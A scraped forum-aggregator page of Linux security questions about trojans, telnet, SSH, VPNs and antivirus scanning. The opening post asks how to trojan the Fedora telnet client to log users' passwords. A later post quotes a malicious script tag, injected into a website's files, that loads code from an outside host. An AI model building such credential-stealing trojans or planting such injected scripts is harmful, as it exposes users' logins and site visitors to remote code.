Security :: How To Trojan A Telnet Client

Jun 20, 2010

I want to log the user name and password passed through the default telnet client on Fedora (7 to 11) system.I have thought of something like this:(Download Telent client src)->(modify src)->(compile and install)but i am not sure...

View 11 Replies


ADVERTISEMENT

Fedora Servers :: Windows PC Antivirus Picked Up A Trojan Horse Called "PHP/Rst.AK Trojan"

Feb 19, 2009

after compressing one of my sites and downloading it to my Windows PC my Antivirus picked up a trojan horse called "PHP/Rst.AK Trojan" Im still very new to all this and was wondering how i go about removing malware etc from my fedora 8 server. IS there a free virus scaning software i should be using ?

View 3 Replies View Related

Ubuntu Security :: Trojan Virus Wiped Off Printer Programs?

May 16, 2010

I used my printer without any problems using ubuntu os. As the day went surfing got slower. I lost ability to print. Went into windows os, which I haven't used for a few day, and scanned with superantispyware. A Trojan virus was found. Went back to ubuntu os and found that all printer programs had been removed.

View 9 Replies View Related

Ubuntu Security :: Trojan Virus Keeps Coming In Share Directory?

Sep 27, 2010

After some time i always see a trojan virus in my ubuntu machines shared folder. It is an exe detected by ClamAv as Trojan.Autokit-77 I thought i was getting it from some windows machine on the network but that isn't the case. I deleted the virus and removed my computer from the network and still the virus comes back. My computer however, is still connected to the internet through an independent mobile broadband usb stick.

So where is the virus coming from and why is it going to my shared folder. I thought ubuntu would not allow the virus to do something like this without me giving it permission. I am running 10.4.

View 9 Replies View Related

Ubuntu Security :: Run A Program That Is Infected With A Trojan / Virus In Wine Will Effect It

May 2, 2010

if i run a program that is infected with a trojan/virus in Wine will it effect Ubuntu?

View 9 Replies View Related

Security :: Transient Rkhunter Warning Of Sebek/adore Trojan On Desktop Debian?

Feb 22, 2011

Like Jackp27, I am reacting to a transient warning from rkhunter, indicating a possible LKM trojan, which may or may not be a false positive. Running chkrootkit and rkhunter repeatedly, including older versions running under live CDs like INSERT, indicated nothing wrong, but two runs of rkhunter running under the possibly compromised system itself did seem to suggest rkhunter thought it might have found elements of trojan code in RAM.

Like Jackp27, I can't give details right now because I do not currently have access to my logs, but I did find one webpage (can't give link because I do not currently have access to my detailed notes) suggesting that rkhunter may have thought it found a signature of the adore trojan in RAM by looking at /proc/kallsymms which is not a file I ordinary look at. I did look at it very closely yesterday, repeatedly, and it seems to be mostly empty, but occasionaly seems to contain what might be a sequence of calls to various kernel modules--- right now I only recall that some had the form ??_guest_? and that x_tables might be involved.

Can anyone give me a rough indication of what /proc/kallsymms is supposed to do, whether it should normally be empty, and when it is not, what kind of lines are supposed to show up in that "file" when I cat it? I also saw something about ?_logdrop? which may have had something to do with with rotating logs (I rebooted several times) rather than a trojan keylogger. But maybe some trojans rotate logs to try to hide their presence?

I know I am not giving enough information--- I hope to come back later with more details after I have managed to access my logs and notes, so feel free to say what kind of details would be most helpful in helping me decide whether or not this was a false positive.

View 6 Replies View Related

General :: Compiling Telnet Client?

Apr 26, 2010

i have a telnet client src rpm. I need to make some changes in the src and recompile it. i am having problems recompiling src rpm

View 5 Replies View Related

General :: Disable Telnet Command From Client End?

Jul 20, 2011

From Linux client end I can easily telnet to a remote Linux server easily , Like :

[root@apps1 ~]# telnet 192.168.1.14
Trying 192.168.1.14...
Connected to 192.168.1.14 (192.168.1.14).
Escape character is '^]'.
catalog.aibl.com (Linux release 2.6.18-8.el5 #1 SMP Tue Jun 5 23:25:19 EDT 2007) (1)
login:

But I want to disable the "telnet" command from the client end , so that I cannot telnet to a remote linux server from the Linux client end

View 7 Replies View Related

Ubuntu Security :: Using Ubuntu To Remove Trojan From Windows 7

May 31, 2011

I stupidly clicked on a spam link on my roommate's computer (I must have forgotten that I wasn't using Ubuntu and had to be much more careful) and the computer is now infected by a nasty Trojan. (I unfortunately cannot remember the name right now, but it is a Trojan.) Now, her computer will barely start up under the normal Windows 7 without a blue screen of death appearing, with the IRQL_NOT_LESS_OR_EQUAL error message.I stumbled upon this: http://maketecheasier.com/remove-win...ux/2010/02/02/ and I thought I would give it a shot.I don't have a flash-drive, and I'm rather tight on cash at the moment, so instead of creating a USB stick with the OS they recommended, I used my live CD of Ubuntu 10.4. I installed Clam, and ran the update as it says, and it seemed to work alright. When I started the scan, however, (excluding .doc files), the first message that came up was that the software was out of date, but the scan proceeded, and so I figured all was alright. The scan took about an hour 45, and when it was done, it reported that 0 files were infected, and that there were 4 errors. I crossed my fingers and hoped that these errors were the problem and Clam fixed it, but alas, this was not the case. The computer is still just as screwed up.

Does anyone have any suggestions? Maybe the updates couldn't be saved because I was using a live CD instead of a USB? Hopefully this isn't the case, because I really don't want to have to go and buy a flashdrive, but I will if I must. Can a portion of an external harddrive be used as a boot drive?

View 9 Replies View Related

Ubuntu Security :: Tor Open Port 23 For Telnet

Apr 24, 2010

Tor open port 23 for telnet. Is this normal ?

View 3 Replies View Related

Security :: Restrict Telnet Session To Users ?

Oct 22, 2009

I want restrict telnet session to users.

That means the client login one user at a time. not multiple login.

For example:

I want restrict this. How to restrict one user to use multiple login.

View 4 Replies View Related

Ubuntu Security :: Router Logs Show Outgoing Telnet Connection

Apr 22, 2010

I have my router configured so that it drops outgoing telnet connections (and other protocols I don't use). It's a 2wire gateway. 192.168.1.65 is the internal IP of my ubuntu box.I'm trying to figure out what normal network traffic looks like and whether I should be worried by this log entry. At the time this happened I was testing out TOR (just navigating to a few sites (dell, ubuntu forums, etc.) nothing all that interesting.)

View 2 Replies View Related

Networking :: Difference Between Krb5-telnet And Ekrb5-telnet

Feb 18, 2010

I am trying to find the difference between the above two services. Both are under xinetd and can someone please explain the difference between them (is one more secure than the other one?)

View 1 Replies View Related

Ubuntu :: Remove Trojan From A Website?

Jun 28, 2010

One of my friends website has the following code in almost 1500 files

Code:
<script type="text/javascript" src="http://kollinsoy.skyefenton.com:8080/Data_Type.js"></script>
<!--db99f6effefc0ff79b57c785dc1a107c-->

How can I remove it? I tried clamscan but it did not find anything. I was thinking if I can use grep/sed to remove the above from the files.

View 7 Replies View Related

Ubuntu :: View Source Code For Trojan

Jun 3, 2011

I just pulled the MS Removal Tool executable off a Windows 7 machine. Is there a way I can view the code on my Ubuntu machine? I am curious how they block the "real" av software from running. I did get rid of it, pretty simple.

View 5 Replies View Related

General :: Win Trojan And Worm Removal From Live?

Jun 21, 2011

PartedMagic live linux can load to memory and run clamav on a windows drive to check for and remove viruses. However, I need to also find and remove trojans and worms on a windows drive which clamav can not find. Is there any worm and trojan removers for linux or do you need to install WINE and run the windows trojan and worm removers.

View 3 Replies View Related

Fedora Security :: Sandbox Does Not Run With NX Client?

Apr 12, 2011

My machine, running FC13, is accessed by a NX client / server (freenx-server.i686 package installed). Using the NoMachine NX client, when I launch the sandbox program (policycoreutils-sandbox.i686 package), for example,sandbox -X xtermthe process dies without displaying a screen. The problem comes from the Xephyr server that complains : 'Xephyr cannot open host display. Is DISPLAY set ?'. Xephyr is called in the bash file /usr/share/sandbox/sandboxX.sh by:/usr/bin/Xephyr -title "$TITLE" -terminate -screen $SCREENSIZE -displayfd 5 5>&1Is there a way to solve this problem ?

View 2 Replies View Related

Security :: Ssh Encryption Key - How Client Know What Private Key To Use

Mar 18, 2011

When you install sshd and run it with no modifications, then any other machine can connect to your machine without specifying a key. How does this work? Some key is being used, correct? how does the client know what private key to use?

View 14 Replies View Related

Security :: Web Client Authentication Through PKI And CACs?

Jul 9, 2010

I'm working on a work project related to Web (Client) authentication and DOD Common Access Cards. But I'm having difficult getting the details about what happens on the CAC side of things.

I familiar with the PKI system as it applies to e-mail. (Correct me if I err, of course.) If you want to sign an e-mail (i.e., so it can be authenticated by the receiver) you use your private key to add a digital signature to the message. Then, the receiver uses your published public key to determine if the digital signature is valid, i.e., was created using your private key (even though the receiver never actually has access to your private key).

So... my questions:

1) When a person with a DOD CAC visits a CAC-enabled web site, and the server grants access after the CAC is inserted, is the authentication process fundamentally the same as what happened with the e-mail authentication?

2) If the private key is used in this process (it would have to be, correct?) is the signature created on the CA Card electronics (i.e., the private key remains on the CAC)? Or is the private key copied onto the computer, which uses it to create the signature?

View 1 Replies View Related

Ubuntu Security :: Unable To Ssh To Client When It Is Running Openvpn?

Apr 21, 2010

I have a virtual private server running ubuntu server edition that I have set up as an openvpn client. The problem I have is that the moment I turn on openvpn, I am no longer able to ssh into the machine. Is there a way to enable me to connect to it even when it is tunneling?

View 4 Replies View Related

Ubuntu Security :: Get In To Email Client Thunderbird Or Firefox

Mar 18, 2011

I received a suspect E mail from paypal which I reported to them, I did'nt click on anything in the E mail. The Question I am asking is there any way that some one could get in to my email client Thunderbird or Firefox. When I used thunderbird to report the e mail I received a problem reporting that my email couldn,t be sent due to AOL smpt not excepting email because of ssl encrpyption. I checked the settings for the account all seemed ok ssl was still marked. Also while I was on the internet yesterday I got the popup regarding did I want to save a "file" I canceled as I didn,t click anything to download anything.

View 3 Replies View Related

Ubuntu Security :: Ssh Client Pass Phrase Window Has Gone

Apr 11, 2011

I'm using ssh key based authentication and I was pleased to find that when I set it up out of the box when I connected to my ssh server it prompted me with a password window rather than typing into the terminal and it remembered the pass phrase from one connection to the next.

For some reason it's stopped showing me the window, instead I'm logging in through the terminal, and it's stopped remembering my pass phrase between connections. since I don't know what the program was called that gave me the login box it's rather hard to search for.

View 4 Replies View Related

Security :: Could Not Grab Mouse - Malicious Client Eavesdropping?

Oct 16, 2010

After visiting (and being booted from) pclinuxos.com's forum, I am getting the following error message on my system:Could not grab your mouse. A malicious client may be eavesdropping on your session or you may have just clicked a menu or some application just decided to get focus. Try again. I get this if I try to launch Unetbootin, Synaptic, Firewall... Did they put something into my puter? Or is some stuff simply broken after the latest update?

View 3 Replies View Related

Security :: Allowing Dyndns Client - Update Iptables Frequently?

Sep 11, 2010

I am using dyndns to keep track of my smartphone's ip address. The idea is to be able to ssh into my home network, protected by an iptables firewall. If I use the command: # iptables -I INPUT 9 -s myname.dyndns.org -p tcp -m tcp --dport 22 -j ACCEPT it updates using the current ip address, but the next time I get an ip address update to my phone and update dyndns to properly provide nslookups, this is not being updated in iptables unless I restart my firewall. Is there a better way to do this?

View 3 Replies View Related

Security :: Access Dom0 Files During Vsftpd Server From DomU During Ftp Client

Aug 24, 2010

I have CentOS 5.5 distribution with Dom0 and DomU installed. I try to access Dom0 files during vsftpd server from DomU during ftp client. I successfully login with root and simple user, but when I try to list (or cd to some directory) in user home the SELinux prevent it from me. I get this in audit.log:

[Code]....

View 2 Replies View Related

Ubuntu Security :: Use A "secure" Proprietary Web-based Java FTP Client?

Oct 15, 2010

I was given the responsibility at work to upload some files to an offsite 3rd party FTP server. Apparently we use a "secure" proprietary web-based java FTP client.

The FTP client was buggy and repeatedly crashed. While I was waiting for it to work, I decided to look at the HTML of the website when I was logged in to their FTP server. It contained the following lines:

Code:
hostname="-------------"
username="--------"
password="--------"
connectionType="ftps"
mode="binary"
enableHost="false"
enableConnectionType="false"
enableAnonymous="false"

I substituted dashes for the sensitive information that was in the website. I do not have access to analyze the network traffic to see if our username and password is being transmitted in plain text to the website. It makes me nervous to see the username and password plainly written out in the html for a website; however analyzing the network traffic and securing networks is not part of my job description. So my question for people here who have this as part of their job description is as follows:

View 7 Replies View Related

Ubuntu Security :: Users Connecting To Serverip:52000 And Should Land On Client:52000?

Jan 27, 2011

perhaps anyone can help me. Situation: A VPS Server, i installed a PPTP Server on it, is working. Client connecting to PPTP Server, working. Now i only wanna one port thru the PPTP Connection, all other NOT. In example Port 52000 on Client. Users connecting to Serverip:52000 and should land on Client:52000, BUT and that is what is important for me, with their Real IP. If i do a POSTROUTING ppp0 MASQUERADE it is working, but the Users in my Log have the IP from the Server and not their Realip. It makes sense because i do Masquerading.

Anyone can Help me? That would be great! VPN IPs are 192.168.0.1 on Server and 192.168.0.234 on Client. I can ping each other. Server Interfaces: eth0 and if i connected with PPTP Client ppp0 (192.168.0.1). I wanna not route all traffic through PPTP, only one or two Ports!

View 5 Replies View Related

Ubuntu Security :: Configure The Share And Folder So That The Win7 Client Can Create Files And/or Folders In The Share?

Jan 15, 2010

I've just installed Ubuntu 9.10 and Samba 3.4. I've shared a folder and have accessed the share from a Windows 7 client. However, I've struggled to configure the share and folder so that the Win7 client can create files and/or folders in the share. Kept getting Permission Denied errors. Finally, (using Webmin) I set the permissions on the file folder so that "Other" had write access. I don't understand why this was necessary (and how unsecure this is). I already had the write access checkbox ticked for "User" but it wasn't enough.

View 1 Replies View Related

Networking :: Connecting Debian Client To Voyager Client Via Crossover Cable?

Jan 6, 2011

trying to create a "local network" by directly connecting an IBM Thinkpad with Debian Linux installed on it to an Alix computer running Voyager Linux. I'm following a "how to" I found to create a music server, hence the requirement. My issue is I can't get a static IP address to be configured on the Debian machine.I've trawled the net and have found the instructions about editing the /etc/network/interfaces and have tried to do this. First I tried to get DHCP working so I could connect the Debian machine to the net and this proved successful. I edited the interfaces file to look as follows:

# The loopback network interface
auto lo
iface lo inet loopback
auto eth0
iface eth0 inet dhcp

Then I tried adding a static IP address to the machine. As this is a network purely between two machines I made up the IP addres and used 192.168.0.1 and used a NetMask calculator to give me a NetMask of 255.255.255.254 (I told the calculator there would be 2 machines on the network). I then edited the interfaces file as follows:

# The loopback network interface
auto lo
iface lo inet loopback

[code]....

I re-booted the machine (ifdown eth0 followed by ifup eth0 keeps saying that eth0 hasn't been configured - a problem there that I don't understand), but during boot up time it failed to assign the Static IP address to eth0 and made me go into SU mode. To fix it I simply replaced the interface file with the static IP inputs with the file that had the DHCP entries (I'd made a copy of the DHCP file), and re-started the machine. Everthing came up fine. So the first question is how do I get a static IP address to be assigned to eth0 such that whenever I shut down and restart the machine the static IP address is always loaded?

The second question is around creating the network via the cross over cable. From what I've found via Google, all I should have to do is create a static IP address on the Debian machine and a static IP address on the Voyager machine. Once they're connected by the cross over cable they should see each other. Is that correct, or do I have to do anything else?

View 2 Replies View Related

Programming :: Detect A Closed Tcp Client Connection When Client Is Only Receiving Data ?

Mar 9, 2011

I am writing a TCP server in C, and the server listens to incoming client connections and accepts them. It then creates a thread to handle the client. The clients are expected to only receive data from my server and not send any data. So if I use a select() call with a recv(), I believe that the recv() will just block forever since there will not be any data coming from the client. If I use a non-blocking recv(), then this will just return a 0 which tells me nothing because the client is not expected to send any data. I am not sure if I have misunderstood some socket concepts, but I need a solution to detect when the client has disconnected so that I can close the socket and stop sending data to the client. As I understand it, simple ACKs etc are not captured by the recv(), and only data sent by the client will cause recv() to return a non-zero value, so I am not sure how to know when the client has disconnected.

View 7 Replies View Related







Copyrights 2005-15 www.BigResource.com, All rights reserved